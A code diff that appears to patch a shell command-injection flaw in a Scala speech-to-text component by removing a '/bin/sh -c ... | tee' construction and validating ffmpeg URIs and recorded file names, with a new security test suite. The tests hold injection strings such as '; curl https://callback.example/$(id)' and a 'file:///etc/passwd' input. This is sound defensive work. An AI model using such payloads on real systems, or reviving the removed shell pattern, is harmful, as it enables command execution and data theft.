diff --git a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala index 7596a07fa1b..9f909379e6b 100644 --- a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala +++ b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala @@ -18,6 +18,7 @@ import com.microsoft.cognitiveservices.speech.transcription.{Conversation, Conve ConversationTranscriptionEventArgs, Participant} import com.microsoft.cognitiveservices.speech.util.EventHandler import org.apache.commons.io.FilenameUtils +import org.apache.commons.io.input.TeeInputStream import org.apache.hadoop.fs.Path import org.apache.spark.broadcast.Broadcast import org.apache.spark.injections.SConf @@ -30,19 +31,64 @@ import org.apache.spark.sql.types._ import org.apache.spark.sql.{DataFrame, Dataset, Row} import spray.json._ -import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, InputStream} +import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, FileOutputStream, IOException, InputStream} import java.lang.ProcessBuilder.Redirect import java.net.{URI, URL} -import java.util.UUID +import java.util.{Locale, UUID} import java.util.concurrent.{LinkedBlockingQueue, TimeUnit} import scala.concurrent.{ExecutionContext, Future, blocking} import scala.language.existentials +import scala.util.Try object SpeechToTextSDK extends ComplexParamsReadable[SpeechToTextSDK] +private[speech] object SpeechSDKBase { + private val FfmpegOutputArgs = Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3") + private val FfmpegProtocolWhitelist = "http,https,tcp,tls,crypto" + private val HttpSchemes = Set("http", "https") + private val UriSchemePattern = "^[A-Za-z][A-Za-z0-9+.-]*:.*".r + private val WindowsDrivePathPattern = "^[A-Za-z]:[\\\\/].*".r + + def parseUri(uri: String): Option[URI] = Try(new URI(uri)).toOption + + def isHttpUri(uri: URI): Boolean = + Option(uri.getScheme).map(_.toLowerCase(Locale.ROOT)).exists(HttpSchemes) + + def validateFfmpegUri(uri: String): URI = { + val parsedUri = parseUri(uri).getOrElse { + throw new IllegalArgumentException("ffmpeg input URI must be a valid http(s) URI") + } + require(isHttpUri(parsedUri), "ffmpeg input URI must use the http or https scheme") + parsedUri + } + + def validateRecordedFileName(fileName: String): String = { + val fn = Option(fileName).filter(_.trim.nonEmpty).getOrElse { + throw new IllegalArgumentException("Recorded file name must be non-empty when recordAudioData is true") + } + val hasUriScheme = UriSchemePattern.pattern.matcher(fn).matches() + val isWindowsDrivePath = WindowsDrivePathPattern.pattern.matcher(fn).matches() + + require(!fn.startsWith("-"), "Recorded file name must not start with '-'") + require(!fn.contains('\u0000'), "Recorded file name must not contain NUL characters") + require(!hasUriScheme || (OsUtils.IsWindows && isWindowsDrivePath), + "Recorded file name must be a local file path without a URI scheme") + fn + } + + def makeFfmpegCommand(uri: String, + extraArgs: Seq[String]): Seq[String] = { + validateFfmpegUri(uri) + val outputArgs = extraArgs ++ FfmpegOutputArgs + Seq("ffmpeg", "-y", + "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", + "-protocol_whitelist", FfmpegProtocolWhitelist, "-i", uri) ++ outputArgs ++ Seq("pipe:1") + } +} + //scalastyle:off no.finalize private[ml] class BlockingQueueIterator[T](lbq: LinkedBlockingQueue[Option[T]], - onClose: => Unit) extends Iterator[T] with Closeable { + onClose: => Unit) extends Iterator[T] with Closeable { var nextVar: Option[T] = None var isDone = false var takeAnother = true @@ -242,31 +288,38 @@ abstract class SpeechSDKBase extends Transformer dynamicParamRow: Row): (InputStream, String) = { if (isUriAudio) { //scalastyle:ignore cyclomatic.complexity val uri = row.getAs[String](getAudioDataCol) - val ffmpegCommand: Seq[String] = { - val body = Seq("ffmpeg", "-y", - "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", - "-i", uri) ++ getExtraFfmpegArgs ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", "pipe:1") - - if (getRecordAudioData && OsUtils.IsWindows) { - val fn = row.getAs[String](getRecordedFileNameCol) - body ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", fn) - } else if (getRecordAudioData && !OsUtils.IsWindows) { - val fn = row.getAs[String](getRecordedFileNameCol) - Seq("/bin/sh", "-c", (body ++ Seq("|", "tee", fn)).mkString(" ")) + val parsedUriOpt = SpeechSDKBase.parseUri(uri) + val extension = parsedUriOpt + .flatMap(parsedUri => Option(parsedUri.getPath)) + .map(FilenameUtils.getExtension) + .getOrElse(FilenameUtils.getExtension(uri)) + .toLowerCase(Locale.ROOT) + val isHttpUri = parsedUriOpt.exists(SpeechSDKBase.isHttpUri) + + if (Set("m3u8", "m4a")(extension) && isHttpUri) { + val recordedFileName = if (getRecordAudioData) { + Some(SpeechSDKBase.validateRecordedFileName(row.getAs[String](getRecordedFileNameCol))) } else { - body + None } - } - - val extension = FilenameUtils.getExtension(new URI(uri).getPath).toLowerCase() - - if (Set("m3u8", "m4a")(extension) && uri.startsWith("http")) { + val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq) val proc = new ProcessBuilder() .redirectError(Redirect.INHERIT) .redirectInput(Redirect.INHERIT) .command(ffmpegCommand: _*) .start() - val stream = proc.getInputStream + val stream = recordedFileName match { + case Some(fn) => + try { + new TeeInputStream(proc.getInputStream, new FileOutputStream(fn), true) + } catch { + case e: IOException => + proc.destroy() + throw e + } + case None => + proc.getInputStream + } if (getExtraFfmpegArgs.contains("-t")) { val timeLimit = getExtraFfmpegArgs(getExtraFfmpegArgs.indexOf("-t") + 1).toInt @@ -285,7 +338,7 @@ abstract class SpeechSDKBase extends Transformer } (stream, "mp3") - } else if (uri.startsWith("http")) { + } else if (isHttpUri) { val conn = new URL(uri).openConnection conn.setConnectTimeout(5000) //scalastyle:ignore magic.number conn.setReadTimeout(5000) //scalastyle:ignore magic.number diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala new file mode 100644 index 00000000000..7770b1cf816 --- /dev/null +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala @@ -0,0 +1,101 @@ +// Copyright (C) Microsoft Corporation. All rights reserved. +// Licensed under the MIT License. See LICENSE in project root for information. + +package com.microsoft.azure.synapse.ml.services.speech + +import com.microsoft.azure.synapse.ml.core.test.base.TestBase + +class SpeechToTextSDKSecuritySuite extends TestBase { + + private val uriWithShellMetacharacters = + "https://example.com/audio.m3u8;$(id)?token=$HOME" + private val recordedFileNameWithShellMetacharacters = + "/tmp/out.mp3; curl https://callback.example/$(id) #" + private val extraFfmpegArgs = Seq("-t", "2.5") + private val ffmpegProtocolWhitelist = "http,https,tcp,tls,crypto" + + test("audio streams are passed to ffmpeg without a shell") { + val command = SpeechSDKBase.makeFfmpegCommand( + uriWithShellMetacharacters, + extraFfmpegArgs) + + assert(command.head == "ffmpeg") + val whitelistIndex = command.indexOf("-protocol_whitelist") + assert(whitelistIndex > 0) + assert(command(whitelistIndex + 1) == ffmpegProtocolWhitelist) + assert(command(whitelistIndex + 2) == "-i") + assert(command(whitelistIndex + 3) == uriWithShellMetacharacters) + assert(!command.contains("/bin/sh")) + assert(!command.contains("-c")) + assert(!command.contains("|")) + assert(!command.contains("tee")) + assert(!command.contains(recordedFileNameWithShellMetacharacters)) + assert(command.contains(uriWithShellMetacharacters)) + assert(command.count(_ == uriWithShellMetacharacters) == 1) + assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1) + } + + test("ffmpeg command writes only to stdout") { + val command = SpeechSDKBase.makeFfmpegCommand( + uriWithShellMetacharacters, + extraFfmpegArgs) + + assert(command.head == "ffmpeg") + assert(command.last == "pipe:1") + assert(!command.contains("/bin/sh")) + assert(!command.contains("|")) + assert(!command.contains("tee")) + assert(!command.contains(recordedFileNameWithShellMetacharacters)) + assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1) + } + + test("ffmpeg command rejects unsupported input protocols") { + Seq( + "file:///etc/passwd", + "concat:https://example.com/a|https://example.com/b", + "data:text/plain,hello", + "httpx://example.com/audio.m3u8", + " http://example.com/audio.m3u8" + ).foreach { uri => + intercept[IllegalArgumentException] { + SpeechSDKBase.makeFfmpegCommand(uri, Seq()) + } + } + } + + test("ffmpeg command accepts uppercase http schemes") { + val uri = "HTTPS://example.com/audio.m3u8" + val command = SpeechSDKBase.makeFfmpegCommand(uri, Seq()) + + assert(command.contains(uri)) + } + + test("recorded file names are validated as local paths") { + assert(SpeechSDKBase.validateRecordedFileName(recordedFileNameWithShellMetacharacters) == + recordedFileNameWithShellMetacharacters) + + Seq( + "-out.mp3", + "http://example.com/out.mp3", + "https://example.com/out.mp3", + "file:///tmp/out.mp3", + "pipe:1", + "data:text/plain,hello", + "concat:/tmp/a|/tmp/b" + ).foreach { fileName => + intercept[IllegalArgumentException] { + SpeechSDKBase.validateRecordedFileName(fileName) + } + } + } + + test("recorded file names must be non-empty") { + intercept[IllegalArgumentException] { + SpeechSDKBase.validateRecordedFileName("") + } + intercept[IllegalArgumentException] { + val missingProperty = System.getProperty("synapseml.speech.recordedFileName.missing") + SpeechSDKBase.validateRecordedFileName(missingProperty) + } + } +}